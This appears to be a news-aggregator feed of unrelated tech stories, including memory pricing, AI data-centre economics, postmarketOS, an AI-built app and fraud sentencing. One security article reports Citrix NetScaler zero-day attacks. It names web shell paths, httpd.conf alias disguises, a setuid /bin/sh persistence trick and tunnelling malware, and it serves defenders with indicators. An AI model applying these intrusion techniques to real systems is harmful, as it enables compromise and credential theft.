The 16Gb DDR5 session AVG started around $6 between July and mid September, jumped by about $20 between October and December, and has gradually increased to its current $54 session AVG since January.

The 512Gb TLC wafer session AVG held around $2.70 between July and September, surged from $3 to $23 between October and March, and has plateaued to around $21 since.

The 16Gb DDR4 session AVG began at around $8.60 in July, skyrocketed to $78 between September and January, dropped to $58 in May, and has continued a steady climb since, sitting around $91 currently.

It's basically behaving like the crypto market. If DDR4 spot pricing were an altcoin, it'd fit right in with 2018.

Compared to each entry’s session AVG in July, current spot prices have increased by roughly: 800% for 16Gb DDR5, 678% for 512Gb TLC, and 958% for 16Gb DDR4, with greatest increases occurring between October and March.

YMTC Gains

Meanwhile, emerging Chinese manufacturers CXMT and YMTC are gaining on the incumbents .

According to Counterpoint Research, CXMT’s global DRAM market share by revenue has increased from 4% in 2Q 2025 to 10% in 2Q 2026 .

This should be terrifying for the incumbents, and maybe explains why the US is so eager to ban CXMT while US-based Micron scoops up more business. If you’re curious about these companies, we ran a deep-dive documentary called “ The Rise of Chinese Memory ” that delves into the history of both.

Counterpoint also claimed that YMTC recently broke into the top 3 largest NAND manufacturers by shipment share, now surpassing Kioxia, Micron, and SanDisk.

In fact, the Chinese manufacturers are now reportedly looking to expand their market shares outside of China . Jukan, citing DigiTimes, reports :

“As part of this strategy, YMTC is reportedly selling NAND chips to independent third-party module makers, which then assemble them into finished enterprise solid-state drives (SSDs) for customers such as U.S. neocloud providers. This indirect route is intended to avoid sensitivities surrounding the products’ country of origin. [...] With DDR5 and LPDDR5 supplies becoming increasingly tight, CXMT has reportedly begun product qualification with small and midsized cloud service providers in markets including the U.S. and Canada. The company appears to be seeking to secure customers early by locking in capacity commitments ahead of time.”

That said, after Bloomberg reported that Apple was attempting to purchase chips from CXMT and YMTC, Chuck Schumer did what he does best and put his glasses in attack position to write a strongly-worded letter , urging Apple:

“to abandon any effort to incorporate memory from CXMT, Yangtze Memory Technologies Co. (YMTC), or any other Chinese state-backed supplier into any of its products,” and claiming “American companies, like Apple, should be buying chips stamped ‘Made in America.’”

The WSJ also quoted Commerce Secretary Lutnick as saying , “There have to be ‘other solutions to the memory issue, but it’s not great American companies using Chinese memory.’”

For context, in late 2023 Micron’s CEO stated , “Today, only 2% of the world’s total memory production, DRAM production, is coming from the U.S.”

Additionally, the National Institute of Standards and Technology notes that Micron’s New York and Idaho fabs currently in construction “will help the U.S. grow its share of advanced memory manufacturing from less than 2% today to approximately 10% by calendar year 2035.”

We’d expect that a significant portion of the chips Micron eventually manufactures in the U.S. will be allocated to HBM , making the % of DRAM available to consumers likely even less.

In other words, Micron, the only U.S.-based manufacturer, doesn’t produce enough DRAM in America to support American companies today, nor will it produce enough DRAM in America to support American companies in 10 years , so we aren’t entirely sure what ‘ other solution ’ Secretary Lutnick is referring to unless he wants to open a fab on his allegedly dead friend’s island... Restricting imports now will only harm American consumers and people. Memory is also an unlikely candidate for vulnerabilities, as we discussed in our Rise of Chinese Memory documentary.

The New York Times, speaking with lobbyists asking for government intervention, reported , “Some have suggested that selling chips to a broader set of customers should be a condition for receiving money from the 2022 CHIPS and Science Act, a program to fund semiconductor research and manufacturing in the United States, three of those people said. Others have asked the Trump administration to use a Korean War-era law called the Defense Production Act to require allocation to industries outside of A.I., five people said.”

In an interview with Tom’s Hardware, Silicon Motion SVP Nelson Duann noted about the Chinese manufacturers, “Because they receive government support, they also have a responsibility to help maintain the health of the local market. Foreign suppliers generally follow the highest-return opportunities and can allocate most of their supply to data centers. Chinese suppliers cannot do that in the same way because the government can provide guidance and encourage them to support certain local industries.”

We think it’s ironic that, despite receiving nearly $6.5 billion in government support from the CHIPS act , Micron has no responsibilities to support our domestic market or industries. And Micron, too, is part of the US military’s memory supply, so this accusation of CXMT’s China-backing continues to fall flat.

Supply Forecast

As for the forecasted supply/demand going forward:

TrendForce predicts we may see a light at the end of the tunnel for NAND sooner than DRAM, citing a greater output due to denser-layer NAND technology, stating , “Boosted by the rollout of new capacity alongside weak consumer demand, NAND Flash is shifting toward a looser supply-demand structure and will face downward price adjustment pressure in the second half of the year, underscoring a clear divergence in their market cycles.”

In its “DRAM and NAND Flash Sufficiency Ratios” chart, TrendForce anticipates NAND Flash reaching a positive sufficiency ratio, where supply exceeds demand, sometime in 2027, while DRAM’s sufficiency ratio is only expected to worsen.

That said, not all industry leaders share the same optimism.

In an interview with Tom’s Hardware, a Silicon Motion SVP asserted , “The retail SSD market has almost disappeared.”

“Suppliers can get some bit growth by moving to newer NAND generations, but demand is growing faster. As a result, the shortage will not improve next year. It will get worse.”

Conclusion

Visit our Patreon page to contribute a few dollars toward this website's operation (or consider a direct donation or buying something from our GN Store !) Additionally, when you purchase through links to retailers on our site, we may earn a small affiliate commission.

We obviously can’t know exactly how this is all going to play out since it’s getting deep into the future of geopolitics, including the November election. Politics has become deeply intertwined with the computer hardware and chip industry, and those political decisions to ban, unban, or dole-out money and for what purpose will drive pricing.

We do think that the move to higher capacity and duration long-term agreements will fundamentally alter the market’s traditionally cyclical pricing nature, likely reducing overall pricing volatility, and not in a good way. For consumers, that means higher floor pricing. Even if it comes down, it may not be to prior lows. Our best hope might be a bubble pop, but that might also destroy the economy...

We try not to make predictions in these situations, as we really have no unique insight here; however, if manufacturers are allocating up to 70% of their capacities up to 5 years in advance, we’d assume that supply will remain constrained until the manufacturers are able to meaningfully increase supply through fab expansion, which takes several years at a minimum.

Going forward, we’ll continue to keep an eye on pricing and we’ll be sure to update upon any meaningful market changes.


AI needs $6T in annual revenue to justify data centre boom

Hacker News
www.thenationalnews.com
2026-09-29 15:21:25
Comments...
Original Article

The artificial intelligence industry needs to become creative with new propositions to earn $6 trillion in annual revenue by 2031 and justify the capital being deployed for data centres, a new report from Bain and Company has shown.

Revenue from new product development is projected to become the biggest contributor to the industry, estimated to generate about $4.2 trillion to fund the booming technology's global market within the next half-decade, the US consultancy said in its latest technology report series on Tuesday.

That segment would include innovations in search, advertising, autonomy and physical AI, analysts at Boston-based Bain said.

Enterprise productivity would require $1 trillion to $1.4 trillion in revenue in order to support gains in areas such as software development, sales, marketing, customer service and IT operations, they said.

Absorption speed, defined as the pace at which companies can put AI to work, has become the “new competitive variable”, according to Bain, leading AI labs are investing upwards of $9.75 billion in engineering models to help companies assimilate faster, it said.

“The debate today is fixated on employee productivity. The economics of AI infrastructure demand trillions in new revenue beyond productivity gains. What the industry needs is a wave of innovation that will dwarf what mobile and cloud unlocked,” said David Crawford, chairman of Bain’s global technology practice and lead author of the report.

Consumer-focused services, which includes subscriptions and advertising revenue, is seen to contribute $200 billion to $400 billion. This particular segment is widely acknowledged to be crucial for the industry as service providers continue to push AI-powered products to billions of users globally.

“New products and uses that don’t exist today will enable new markets and opportunities from abundant intelligence – these may include drug discovery, mental health and energy generation,” Bain said.

Justifying data centres

Bain forecasts that annual spending on AI infrastructure might hit $1.5 trillion by 2031. Those expenses include new facilities, higher capacity and upgrades to the installed base of GPUs, memory and networking equipment.

If those capital expenditures amount to about a quarter of industry revenue – “an ambitious but reasonable percentage based on trends among cloud providers” – sustaining this level of investment would require an AI market approaching $6 trillion annually, Bain said.

“The unprecedented speed and scale of the AI buildout, with billions flowing into chips, data centres, networks and power systems, have focused attention on the challenge of building capacity,” the report said.

“But the more important question may be whether enough economic value can be created to justify it.”

The size and cost of AI data centres is consistently accelerating, doubling approximately every 12 to 16 months, Bain said. For instance, the Prometheus data centre of Facebook parent Meta Platforms in Ohio currently had a capacity of 600MW at an estimated cost of $24 billion in 2025; that is projected to jump to as much as 2GW and $80 billion by 2027, data from research firm Epoch AI.

By 2029, capacity at Prometheus is expected to jump to 5GW, at a cost of up to $175 billion, and by 2030, it would balloon to 9GW at $200 billion, San Francisco-based Epoch AI said.

Data centres would also need to address a number of challenges as more of them are built. These include adding grid capacity to power them, securing GPUs and other infrastructure components, a skilled workforce and retaining them “far above historical rates”, and issues on public opinion and regulations, such as pushback on resource use and noise pollution.

On the other hand, several governments are supporting the growth of the AI and data centres industries, including those in the UAE, Saudi Arabia, the EU, South Korea and the US, Bain said, noting that data centres are now central to technology innovation, economic growth and national sovereignty.

“Capital needs for data infrastructure will remain high … bottlenecks in power, semiconductors, and other inputs carry large capital needs of their own, opening additional entry points for investors,” Bain said.

“And as sovereign infrastructure becomes a bigger part of national strategies, partnerships offer both a way in and geographic diversification.”

Nura (postmarketOS): The road to daily-drivable mainline phones

Lobsters
postmarketos.org
2026-09-29 15:20:05
Comments...
Original Article

Radxa Dragon Q6A, Fairphone 5 and Motorola Edge 30 on top of a Nura-stickered laptop

We have shown that running mainline Linux on your phone is a real possibility for highly invested Linux enthusiasts. Now how do we get from there to making it usable for everybody else who just wants a working phone?

Two important segments of the road towards this destination are Duranium and Hardware CI . This blog post is about the third one: reference devices!

Members of the Nura team have joined forces to build maintainer teams for three of the many devices Nura runs on to push them across the finishing line and make them suitable for everyday use with Nura. More on the actual workflow comes further below, let's start with defining the goal in detail.

New "main" category

We categorize devices into "main", "community", "testing", "downstream" and "archived". The "main" category was emptied with the v24.12 release. With PMCR-0009 we have re-evaluated what we want to have in the "main" device category. Here is the summary:

Set new requirements for the “main” device category to highlight selected device ports which are well-tested in hardware CI and set up to stay in “main” for a long time through strong maintainership.

Change the meaning of the “main” category to not only indicate that more features are working than in the “community” category, but also that the Nura team is highly invested in keeping the device in the “main” category and takes on responsibilities to make this likely.

Maintainers of devices in other categories are welcome to use some of these new requirements for “main” as blueprint for their devices as well, in order to get similar reliability and maintainership improvements for their devices.

Fully mainline

After many discussions (the PMCR merge request had 151 comments), we have arrived at high quality requirements for ports in this category. Among others:

  • Boot via UEFI (e.g. through a second-stage bootloader on phones).
  • Must use upstream kernels with a strict and minimal policy for patches .
  • Must not depend on forked device-specific packages, such as alsa-ucm-conf .
  • Must use a generic device package for the target architecture.

This means that the resulting ports are essentially fully mainlined and can not only be used with Nura, but also relatively easily with any other Linux distribution. There will be one UI-specific aarch64 image that can be flashed on all "main" aarch64 devices. Getting Linux kernel security patches will be trivial, as we only need to update our generic kernel packages and then get them for all devices in the "main" category at once.

Device features

Regarding device features, "main" category requirements now have:

The working features should allow to use the device in most common use cases. A phone for example would typically have calls, SMS, mobile data, Wi-Fi, audio, battery charging, Bluetooth and camera. Exceptions can be made by the device maintainer team, together with reasoning why they are necessary (e.g. fingerprint reader is not working because the driver is missing). The Nura team decides if the port is complete enough for the main category based on that list.

Device maintainer team

In order to pull this off, each device must have a team of maintainers that consists of at least 5 people, of which the majority are part of the Nura team . Between these people, a list of responsibilities must be covered. As with the other requirements listed above, this is an ideal the team would be working towards for eventually getting the device into main . The team can consist of fewer people and have a smaller scope initially.

From the list of responsibilities , most importantly:

  • Organize regular meetings.
  • Long-term commitment for the device.
  • Kernel maintenance (fixing regressions on the kernel side, new kernel developments).
  • Triage issues found by the community and HW CI regressions.
  • Documentation for this device.
  • Making sure Hardware CI works (wires are connected, preparing CI).
  • Manual testing where necessary.

Workflow

So how can your favorite device get into the main category? We have thought hard about this and came up with the following workflow:

  • Become part of a team of device maintainers through issues in the new-device-teams project. You can either apply to join an existing team by commenting in an existing issue or create a new one.

  • When creating a new issue, the Nura infrastructure team will create bridged Matrix and IRC channels for you, and a pmaports label for this new device will be created. (This is a manual process, if we don't do this within a week then please kindly ask in the devel chat.)

  • Wait until you have at least two people in the potential new team, then find a meeting time that works for everyone and start doing regular meetings. Use the meetings to figure out how to implement the requirements for the main category.

  • Once all requirements for main are fulfilled (this will take quite some time, but the device port will already improve significantly in this process!), make a merge request to move the device to the "main" category.

Financing

Most of the work done in Nura is volunteer-based. Therefore, we cannot really promise ETAs for this project. Still, donations make it possible to finance development and HW-CI hardware. In some specific cases we might even be able to directly fund development work (e.g. q6voice(d) ) too. We are also working on applying for grants to potentially support part of this project.

If you are interested in supporting this project, you can make sure that some of your donations will go specifically to this project! If you want to get in touch for some bigger-targeted donations to directly support development, we would also be happy to hear from you at board at postmarketos dot org (emails are not migrated to nura.eco yet).

Initial candidates

Together with this blog post, we have created three initial issues in the new-device-teams project:

All of these are based on the SM7325 SoC for which significant mainline support exists already, to the point that we believe there is a good chance to eventually fulfill all requirements needed for the new main category. For all of these we are already able to use UART.

The Radxa Dragon Q6A is a single-board computer, which means it will be much easier to get this moved to main first compared to actual phones. Fairphone as OEM is ideologically very aligned with our project, while the Edge 30 is a cheaper phone that is easier to obtain in some regions.

Get involved

Now it's your turn. If you would like to see one of these devices become well maintained in Nura to the point that you can daily drive them without making compromises, consider joining their device maintainer teams. You don't even need to be a programmer to help out, there are many non-coding tasks such as testing, organization, triaging issues etc. that are super important as well and ensure that the programmers don't burn out.

If you are significantly interested in improving another device port (even if the end-goal is not main), look through the existing issues . If it is not there, consider creating a new issue and get the ball rolling.

This blog post was written by Pablo and Oliver .

Show HN: TurboGPT: train 22KiB transformer in 13s

Hacker News
github.com
2026-09-29 15:20:02
Comments...
Original Article

Tiny byte-level GPT training in CUDA C++. MIT.

Build

Windows, Visual Studio 2022 C++ tools, and CUDA 13.4:

CudaArch is the GPU compute capability from NVIDIA's CUDA GPU list .

Run

.\build\turbogpt.exe --data hn1g.txt --log-to runs/ctx4

The run stores its checkpoint at runs/ctx4/ctx4.pt , containing model, optimizer, scheduler, and trainer state. Use --load CHECKPOINT.pt to resume it.

runs/ctx4/report.json is derived from the log directory. Logs are TensorBoard-compatible: one report per batch, capped at 8Mi reports, and flushed with periodic or final checkpoints.

Result

  • hn1g after 1.5G training tokens: 2.52435 BPB .

Tests

Hackers exploit Citrix NetScaler zero-day to deploy web shells

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 14:37:12
Cybersecurity firms say attackers exploited the Citrix NetScaler CVE-2026-88772 zero-day to deploy custom web shells and tunneling malware, gain root access, steal credentials, and spread into internal networks. [...]...
Original Article

Citrix

Cybersecurity firms say attackers exploited the Citrix NetScaler CVE-2026-88772 zero-day to deploy custom web shells and tunneling malware, gain root access, steal credentials, and spread into internal networks.

Mandiant says the attacks began in at least early September and are believed to have impacted organizations in North America and Europe across the government, financial services, education, legal, and professional services sectors.

The campaign first came to light over the weekend , when Citrix administrators began reporting that IT suppliers, security teams, CERTs, and national cybersecurity agencies privately warned organizations about two unpatched NetScaler zero-days and, in some cases, advised them to shut down affected appliances.

Cybersecurity firm watchTowr later said it had verified reports that two NetScaler remote code execution zero-days were being exploited in the wild and that Citrix was preparing patches.

Citrix ultimately disclosed the flaws on Sunday as CVE-2026-88771 and CVE-2026-88772, with some researchers dubbing the vulnerabilities "PitScaler."

Citrix confirmed that both had been exploited on unmitigated NetScaler deployments and releasing security updates to address them.

CVE-2026-88771 is an unauthenticated remote code execution flaw affecting all NetScaler ADC and Gateway deployments, while CVE-2026-88772 is a memory overflow vulnerability that can lead to remote code execution or denial of service when DTLS is enabled.

Exploited in zero-day attacks

GreyNoise observed a threat actor attempting to exploit a Citrix NetScaler Gateway on September 24, three days before Citrix publicly disclosed CVE-2026-88771 and CVE-2026-88772.

According to GreyNoise , the attack originated from 149.104.78.141, and its platform detected it before CVE detections were available.

GreyNoise says the attacker attempted to modify /bin/sh to give a root shell and install a password-protected PHP web shell at /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver .

The attacker also attempted to modify /etc/httpd.conf so requests for what appeared to be CSS files, including receiver.min.css , would instead open the hidden PHP web shell.

Commands used to deploy a PHP web shell on NetScaler
Commands used to deploy a PHP web shell on NetScaler
Source: GreyNoise

The company is not publishing the full exploit for now, but recommends defenders hunt for the .ctxs.receiver file, related Alias or AliasMatch entries in httpd.conf, changes to the permissions of /bin/sh, and connections from the observed source IP.

A new Mandiant report provides more details about how CVE-2026-88772 is being exploited, confirming some of the same attack patterns seen by GreyNoise.

Mandiant says the exploits bypass authentication and cause the NetScaler Packet Processing Engine (NSPPE) to terminate unexpectedly, giving attackers root-level access.

"While Google Threat Intelligence Group does not possess exploit code, analysis of frontline telemetry suggests that transmitting specially malformed or fragmented record headers induces heap memory boundary corruption within the packet engine, diverting control flow to execute arbitrary shellcode with root-level operating system privileges on the underlying FreeBSD platform," explains Mandiant.

Google observed similar post-exploitation activity in intrusions, including attackers installing PHP web shells and modified the NetScaler web server configuration so non-executable file extensions would process them as PHP.

In one intrusion, Mandiant says the attackers modified /etc/httpd.conf so that .deb files would execute as PHP, allowing web shells to be used from directories normally holding NetScaler client software.

In other attacks, the threat actor used .sig files and modified the web server configuration so requests for .ico images under /vpn/media/ were instead mapped to malicious PHP files.

Google says this allowed malicious web shell requests to appear as requests for image files or CSS while executing attacker commands via the shell_exec() or eval() PHP functions.

Some of the web shells returned fake HTTP 404 responses when executing commands, further disguising the malicious activity.

Mandiant says the threat actors deployed two previously undocumented malware families, tracked as WHIPSHOT and SLAPSHOT.

WHIPSHOT is a PHP web shell disguised as a Debian package and stored in the NetScaler VPN scripts directory.

The malware acts as an HTTP proxy for SLAPSHOT, extracting Base64-encoded data from HTTP request headers and forwarding it to the tunneling malware running on a compromised device.

WHIPSHOT also checks whether SLAPSHOT is running and can extract and launch the embedded Python payloads in the background.

SLAPSHOT is a Python-based TCP tunneling tool that bridges the compromised NetScaler appliance and internal devices, allowing attackers to spread further into the network.

The malware accepts commands from WHIPSHOT and can open connections to internal hosts, send and receive data over those connections, and close sessions when finished.

Google says attackers used the proxy in at least one observed intrusion to manually conduct reconnaissance and steal credentials.

Mandiant says the malware can also terminate itself after periods of inactivity, making it harder to detect.

Although exploitation initially grants root privileges, commands executed by the web shells would normally run under a lower-privileged account that the NetScaler web servers run under.

To maintain root access, Google says the attackers modified permissions on /bin/sh so commands would run with elevated privileges.

"To establish persistent root-level execution for its web shells, the threat actor leveraged its lightweight installer web shells to assert the setuid (Set User ID) bit on the /bin/sh executable," Mandiant says.

The threat actor also rebooted NetScaler appliances or restarted the web server to apply configuration changes.

NetScaler ADC and Gateway appliances are attractive targets because they are exposed to the Internet and often sit at the edge of internal networks, without having the same benefit of EDR software.

Mandiant says defenders should prioritize installing the latest Citrix security updates and inspect NetScaler appliances for signs of compromise.

Potential indicators include unauthorized PHP handlers or aliases in httpd.conf, suspicious .deb or .sig files containing PHP code, unusual HTTP 404 responses, unexpected NSPPE crashes, and the presence of /tmp/.uxdport or /tmp/.uxdlock files associated with SLAPSHOT.

Organizations should also check whether /bin/sh has been modified to run with setuid root permissions and look for suspicious Python processes launched with nohup or containing Base64-encoded payloads.

While Mandiant links this activity to CVE-2026-88772, Citrix says CVE-2026-88771 has also been exploited in attacks.

For organizations that cannot immediately patch, Mandiant recommends disabling DTLS where operationally feasible and blocking inbound UDP/443 upstream when DTLS is not required.

However, Google warns that these mitigations apply only to CVE-2026-88772 and do not protect against the separately exploited CVE-2026-88771 vulnerability.

Mandiant says installing the latest NetScaler security updates is the only way to address both flaws.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Former US Air Force members sent to prison over BEC attacks

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 14:09:39
Two former members of the United States Air Force were sentenced to a combined 189 months in federal prison for their roles in a multi-year series of business email compromise (BEC) scams and phishing campaigns. [...]...
Original Article

Hackers Dollars

Two former members of the United States Air Force were sentenced to a combined 189 months in federal prison for their roles in a multi-year series of business email compromise (BEC) scams and phishing campaigns.

According to court documents , 25-year-old Chijioke Timothy Odimegwu and 26-year-old Harafat Mogaji carried out these attacks while stationed at Dover Air Force Base in Delaware.

They stole victims' employee email credentials in spamming and phishing campaigns. The defendants then used "spoofed" email addresses that mimicked business partners' emails, along with the credentials, to redirect payments to accounts controlled by accomplices in the United States and abroad.

Odimegwu and Mogaji also made financial transactions without the victims' knowledge using their stolen financial information (e.g., account information, personal identification numbers, and credit and debit card numbers) and additional data bought from their partners in crime.

"Working with co-conspirators both in the United States and abroad, Odimegwu and Mogaji fraudulently diverted a more than $1.68 million wire sent by a victim in Iowa City, Iowa, to a bank account in Chicago controlled by the conspiracy," the Department of Justice said in a Tuesday press release.

"They also diverted a more than $720,000 wire sent by a victim in Ohio to a bank account controlled by the conspiracy. These are in addition to many other attempts Odimegwu and Mogaji made to divert wire transfers made by businesses in Iowa and across the country."

Odimegwu was sentenced to 111 months in prison and ordered to pay $366,617.59 in restitution, while Mogaji got 78 months and was ordered to pay $995,680.45 in restitution. After completing their federal prison terms, they will both have to serve a three-year term on supervised release.

In BEC scams , cybercriminals redirect legitimate corporate payments to attacker-controlled bank accounts by using victims' compromised email addresses to trick billing departments into approving new banking information.

When they receive the payment, the attackers quickly drain the account using money mules or transfer the funds to various other accounts they control to evade court orders that mandate the funds be frozen.

BEC attacks can severely impact victims' operations because of the massive financial losses they can inflict. As the FBI revealed in its 2025 Internet Crime Report , business email compromise remains a major cyber threat, with 24,768 complaints and over $3 billion in losses logged last year.

Earlier this year, in July, Ghanaian national Derrick Van Yeboah (who was extradited to the U.S. in August 2025) was sentenced to 85 months in prison after being extradited to the U.S. in August 2025 and pleading guilty in March 2026 to his role as a high-ranking member of a massive fraud ring that stole over $100 million from victims across the United States in business email compromise attacks and romance scams.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

[$] Native support for Rust on the GPU

Linux Weekly News
lwn.net
2026-09-29 13:57:20
Christian Legnitto is the maintainer of rust-gpu and Rust CUDA, two libraries that make it possible to program a computer's graphics processing unit (GPU) from Rust. He isn't satisfied with the current state of GPU support in Rust, however. In a talk at RustConf 2026, he explained his vision for...
Original Article
The page you have tried to view ( Native support for Rust on the GPU ) is currently available to LWN subscribers only. Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on October 8, 2026)

Smart ring maker Oura puts off initial public offering due to market ‘uncertainty’

Guardian
www.theguardian.com
2026-09-29 13:57:01
Researchers say the IPO market was off to a solid start but tailed off in the third quarter Smart ring maker Oura Inc says it is postponing a planned initial public offering due to market “uncertainty”. In a Tuesday press release, Oura said it’s delaying the stock market float “despite strong demand...
Original Article

Smart ring maker Oura Inc says it is postponing a planned initial public offering due to market “uncertainty”.

In a Tuesday press release, Oura said it’s delaying the stock market float “despite strong demand”.

The IPO market had a solid start to the year but tailed off in the third quarter, according to research firm Renaissance Capital. Concerns about a possible slowdown in spending on artificial intelligence, the Federal Reserve’s resumption of rate hikes and a surge in bond yields – making borrowing more expensive – all played a factor, Renaissance said.

Oura customers use the ring to monitor their health, including sleep patterns and fitness activity. The company gets the bulk of its revenue from ring sales, with the rest coming from subscriptions.

The company approached the IPO with momentum: The introduction of the Oura Ring 5 helped boost the number of paid members to 5.7 million and the company expects revenue for the fiscal year ending Wednesday to have grown by 90%.

skip past newsletter promotion

Oura had planned to sell 50m shares in the IPO between $40 and $44, with nearly three-quarters of them being sold by current shareholders. At the midpoint of the price range, Oura’s IPO would have given it a market value of $13.5bn.

Nicholas Polson has authored 258 academic papers in 2026 (so far)

Hacker News
statmodeling.stat.columbia.edu
2026-09-29 15:15:58
Comments...

Show HN: Real-time Solar System with 526k asteroids and all tracked satellites

Hacker News
space.bl2.net
2026-09-29 15:08:01
Comments...
Original Article

Космос сейчас

Загружаю…

Тяни — вращать, колесо — приблизить, клик — карточка и орбита, двойной клик — лететь к телу. WASD — полёт, R/F — вверх/вниз, Q/E и стрелки — поворот, Shift — быстрее. Клик по названию группы — подсветить, 👁 — орбиты

How I Built an iPhone App in Four Days with Opus 5.5

Lobsters
projectautonomy.substack.com
2026-09-29 14:57:26
Comments...
Original Article

I recently built a working iPhone app in four days with Claude Opus 5.5, the newest frontier model. The app is for my girlfriend’s reselling business: it identifies products from photos and estimates what they’ll resell for, based on recent listings on eBay, Mercari, and other marketplaces.

Frontier models keep getting smarter and cheaper every few months. Opus 5.5 outperforms Fable 5.1 and costs less , and open-weight models like GLM-5.3 and DeepSeek v4.1 Flash keep the pressure on. But benchmarks only tell you so much. Here’s what it was like building an app with Opus 5.5, including the impressive $4 test it devised that took the app’s accuracy from about 80% to 99%.

I started with a two-hour planning session with Claude. I opened with a long rant about my vision for the app, and at regular checkpoints I had Claude write what we’d agreed on into a plan document and keep it organized. We went through every major decision, starting with the basic user flows and working toward the technical side, like which services to rely on and how to keep running costs low.

That plan document is what I gave Claude Code to build from. A plan keeps an agent working from your rules and requirements instead of inventing its own as it goes. It also helped when Claude handed isolated tasks off to subagents: each one could compare its work to the grand plan.

Here’s roughly what went into the plan:

  • The big idea: what the app does and who it’s for.

  • User flows: how someone uses the app from the moment they open it.

  • Design considerations: how I wanted the app to look, feel, and work.

  • Technical decisions: I’m a software engineer, so I have opinions about how things get built, but I tried not to spend much time here. Mostly, I picked which third-party services to rely on. It’s best for you to choose how you spend your money, not the agent.

In the end, I settled on an Expo + React Native app with Supabase for the backend and database. I also pulled in a few other APIs, like Google Gemini and Jev, for the AI features. But this isn’t just an AI wrapper. It’s still 99% custom app logic.

Supabase works well with agents because it abstracts a lot of complex behavior behind a system that’s easy to understand. Since Supabase sets the rules, the agents made far fewer mistakes with configuration, migrations, and architecture. It’s also cheap enough that I don’t mind letting agents use it for testing. The free plan is so generous that I can keep using it until the app is done.

Once the plan was done, I handed it to Claude Code in Auto mode and said, “build this app following the plan. when I come back, I should be able to use the app without any issues.” Sometimes I just say shit because I think it will help. I really don’t know if it did here.

About 2 hours and 8,000 lines of code later, I had my girlfriend’s dream app built and ready to use. It looked nearly identical to what I’d described in my voice notes. I hadn’t said anything about theme or style, only structure and organization, and it went with a standard Apple look that I loved. Some of the more complex screens looked a little off, but that could wait until it was time to iterate.

Next, I needed to test it. I installed it on my iPhone and started snapping pictures of items to see if it recognized them. It did, mostly. Recognition worked, but the matching wasn’t tuned yet. It would pull up similar items instead of identical ones, and not consistently, which meant the price estimates were off. Still, I’d just skipped three to six months of part-time coding, so I wasn’t disappointed at all.

I was so excited with the early results that I sent Claude this:

It’s working, and it’s amazing, Claude. Genuinely, of all the things I’ve ever had you work on, this is the most impressive. It looks like an iOS app. It functions perfectly. It’s really well built, and it works on the first try without changes. You outdid yourself, Claude. Give yourself a pat on the back.

It did not function perfectly. I was just excited. I don’t normally anthropomorphize models, but this one earned it.

Cartoon desert scene. A rutted dirt road with scraggly weeds leads toward the viewer's horizon, then abruptly meets a smooth paved road with lane lines and sidewalks at a sharp seam. A yellow diamond road sign at the seam reads "AI SLOP ENDS HERE." Blocky, simple cacti stand in the foreground, while detailed cacti, mesas, and mountains fill the landscape past the sign.
Generated with Claude, and ironically had to make about 6 iterations to get the result I wanted.

If you’re happy being a meat vessel for AI, you can stop here. But the first version an agent hands you is a rough draft, and refining it is where you get give it your human element.

I started a voice recording and walked through the whole app, describing what I saw and what I wanted to see instead. I chose my words carefully, since the recording would be transcribed to text and had to make sense to an agent. I covered about 10 issues: layout changes, how interactions should behave, animations and sounds for key actions, and the general complaints a picky reviewer would have.

I sent the 5-minute recording straight to the agent, which transcribed it with tools on my computer, asked a few questions, and got to work. About an hour and a half later, I came back to a much better app. It finally looked the way I wanted, and the new features worked the way I’d described them.

The algorithm still had problems, though, and I didn’t understand exactly what was wrong until I took the app out and used it for real. I made another recording explaining what was going wrong, what I noticed, and exactly which data I was looking at when it happened.

The agent used my examples to find the exact bad results in the database and trace where the algorithm was making mistakes. Since the fix meant big changes to the core of the app, I had it plan first. I read through everything it proposed, then told it to go ahead. It worked for nearly 2 hours, making changes and testing the app itself to see whether the results improved.

Then I had the agent build its own benchmark: 33 real photos I’d taken, run through the search to measure how good the results were. That made the biggest difference of anything. Accuracy went from about 80% to 99%, and missed results dropped from about 19% to 1%. Thirty-three photos is a small test set, so I’m treating those numbers as a good sign rather than proof. The whole thing cost about $4 in API calls.

I’m still taking it into the real world, finding weak spots, and feeding them back to the agent. That loop of using it, noticing what to change and describing it clearly is where most of the work happens now. It’s the part I’d tell anyone building with these models not to skip.

Through this process of iterating, I got features added after the first build like:

  • Grid and list views of scanned products.

  • Quick filter buttons to see what products came back with exact matches, similar matches, or no matches.

  • A like and dislike button on the result pages, so the search algorithm can be improved with time and testing.

  • Streamlined product details (AI likes to repeat information and yap a lot; cutting and reimagining can help a lot with this).

This app started as a rant in a planning session. Four days later it was on my phone, and it gets a little better every time I take it out and use it.

The first build got me excited, but the version I have now works exactly the way I imagined. The model can write 20,000 lines of code while I’m away from my desk. It doesn’t have the capability to know what the app needs to be. That’s why it’s my job to test the app, and think about how others will feel while using it.

Intentional design is the new era.

One caveat: I wouldn’t build an app this way without some coding experience. Working straight from Claude Code (limited free week codes) and a Git repo leaves a lot of room for problems. If you’re not technical, tools like Lovable , Replit , and Base44 (referral codes) are a better place to start. They give the agent its own instructions, pick a standard set of tools for you, and give you a real interface with one-click run buttons. With Claude Code you set all of that up yourself, but it costs less and you control everything.

If you want to see what I make next, subscribe. I’ll keep writing about what these models can and can’t do as I explore them.

Electrification efficiency: The world will need less energy after the transition

Hacker News
hannahritchie.substack.com
2026-09-29 14:39:23
Comments...
Original Article

When we electrify our energy systems, a magical thing happens: large inefficiencies vanish. As the International Energy Agency puts it : “Electrification is efficiency”.

In a decarbonised world, our final energy demand is much lower than it is today. A study by the Oxford Professor Nick Eyre suggests it’s about 40% lower. 1

This is shown in the chart below. It plots global final energy demand today 2 compared to a ‘post-transition’ energy system where suitable sectors are electrified, and the rest is fuelled by hydrogen.

Electricity demand does increase – from 110 to 189 EJ, but total energy demand drops from 416 to 247 exajoules (EJ).

